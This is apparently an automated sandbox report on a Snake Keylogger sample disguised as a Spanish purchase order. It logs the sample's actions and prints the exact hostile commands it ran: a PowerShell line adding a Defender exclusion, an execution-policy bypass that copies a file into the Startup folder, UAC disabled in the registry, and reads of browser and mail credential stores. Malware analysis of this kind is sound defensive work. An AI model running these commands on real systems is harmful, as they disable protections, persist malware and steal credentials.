Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe" -Force
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe" -Force			Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe'

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 4F4000	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 4F6000	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 98F008	Jump to behavior

Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe" -Force	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Queries volume information: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation

Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disables UAC (registry)

Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Jump to behavior

Source: Amcache.hve.15.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.15.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.15.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.15.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.15.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 16.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3b49528.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3b28af8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3b28af8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3b49528.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2537070598.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1414987538.0000000003AE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2532294899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 8160, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 16.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3b49528.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3b28af8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3b28af8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3b49528.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1414987538.0000000003AE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2532294899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 8160, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 16.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3b49528.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3b28af8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3b28af8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3b49528.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2537070598.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1414987538.0000000003AE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2532294899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7924, type: MEMORYSTR
